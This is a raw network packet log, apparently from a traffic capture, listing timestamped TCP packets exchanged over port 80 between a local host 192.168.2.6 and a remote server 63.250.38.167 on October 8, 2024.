Oct 8, 2024 11:32:04.893774986 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.894288063 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.894298077 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.894309044 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.894351006 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.894362926 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.894373894 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.894375086 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.894387960 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.894488096 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.894499063 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.894510031 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.894515991 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.894520044 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.894532919 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.894543886 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.894556046 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.894567966 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.894601107 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.894601107 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.895261049 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.895272017 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.895282984 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.895307064 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.895350933 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.895361900 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.895369053 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.895380020 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.895402908 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.895421982 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.895421982 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.895503998 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.895515919 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.895526886 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.895538092 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.895549059 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.895629883 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.895636082 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.895642042 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.895653963 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.895687103 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.896380901 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.896478891 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.896490097 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.896501064 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.896512032 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.896547079 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.896558046 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.896568060 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.896579027 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.896588087 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.896632910 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.896632910 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.896646023 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.896656990 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.896667004 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.896672964 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.896682978 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.896697998 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.896712065 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.897509098 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.897691011 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.897814035 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.897825003 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.897838116 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.897998095 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.898092031 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.898463964 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.898475885 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.898475885 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.898475885 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.898475885 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.898475885 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.898488998 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.898647070 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.898649931 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.898658037 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.898669958 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.898679972 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.898691893 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.898704052 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.898714066 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.898720026 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.898725033 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.898739100 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.898752928 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.898765087 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.898780107 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.898780107 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.898780107 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.898834944 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.898844957 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.898857117 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.898933887 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.898945093 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.898952007 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.899005890 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.899010897 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.899023056 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.899032116 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.899045944 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.899056911 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.899069071 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.899107933 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.899136066 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.900180101 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.900191069 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.900208950 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.900228024 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.900239944 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.900242090 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.900250912 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.900263071 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.900274038 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.900285959 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.900296926 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.900299072 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.900299072 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.900299072 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.900309086 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.900320053 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.900331020 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.900345087 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.900357008 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.900368929 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.900382042 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.900405884 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.900417089 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.900417089 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.900417089 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.900417089 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.900418043 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.900428057 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.900449038 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.900463104 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.900471926 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.900471926 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.900476933 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.900533915 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.900542974 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.900543928 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.900554895 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.900576115 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.900715113 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.900738001 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.900808096 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.900897980 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.900944948 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.900957108 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.900994062 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.901007891 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.901036024 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.901065111 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.901283979 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.901294947 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.901314020 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.901324034 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.901336908 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.901484966 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.901493073 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.901499033 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.901518106 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.901530027 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.901540041 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.901551008 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.901562929 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.901575089 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.901585102 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.901587963 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.901587963 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.901597977 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.901648998 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.901676893 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.902340889 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.902390003 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.902403116 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.902415991 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.902427912 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.902482033 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.902493000 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.902503967 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.902515888 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.902525902 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.902563095 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.902574062 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.902584076 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.902585983 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.902597904 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.902610064 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.902621984 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.902650118 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.903131008 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.903345108 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.903356075 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.903357029 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.903367996 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.903379917 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.903398037 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.903409958 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.903422117 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.903424978 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.903431892 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.903433084 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.903444052 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.903444052 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.903455973 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.903466940 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.903477907 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.903489113 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.903501034 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.903512001 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.903512001 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.903537989 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.903564930 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.904033899 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.904095888 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.904105902 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.904118061 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.904330969 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.904341936 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.904341936 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.904344082 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.904356003 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.904395103 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.904403925 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.904407978 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.904419899 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.904511929 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.956710100 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.956739902 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.956751108 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.956762075 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.956832886 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.956845045 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.956865072 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.956873894 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.956883907 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.956896067 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.956906080 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.956921101 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.956944942 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.956945896 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.957005978 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.957016945 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.957027912 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.957041979 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.957060099 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.957061052 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.957061052 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.957072020 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.957087994 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.957098007 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.957109928 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.957113028 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.957119942 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.957135916 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.957146883 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.957158089 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.957269907 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.957281113 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.957290888 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.957303047 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.957319975 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.957330942 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.957341909 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.957355022 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.957367897 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.957379103 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.957379103 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.957379103 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.957379103 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.957379103 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.957379103 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.957391024 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.957402945 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.957402945 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.957402945 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.957427025 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.957463980 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.957482100 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.957493067 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.957515001 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.957571030 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.957581997 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.957591057 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.957618952 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.957714081 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.957726002 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.957736969 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.957746983 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.957757950 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.957768917 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.957779884 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.957791090 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.957802057 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.957812071 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.957824945 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.957851887 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.957851887 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.957851887 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.958100080 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958131075 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.958235979 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958246946 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958257914 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958326101 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958338022 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958348989 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958360910 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958373070 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958384037 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958396912 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958408117 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958417892 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958429098 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958440065 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958451033 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958462000 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958482027 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958494902 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958501101 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.958501101 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.958501101 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.958501101 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.958501101 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.958504915 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958517075 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958525896 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.958525896 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.958525896 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.958530903 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958544016 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.958564997 CEST	50002	80	192.168.2.6	63.250.38.167
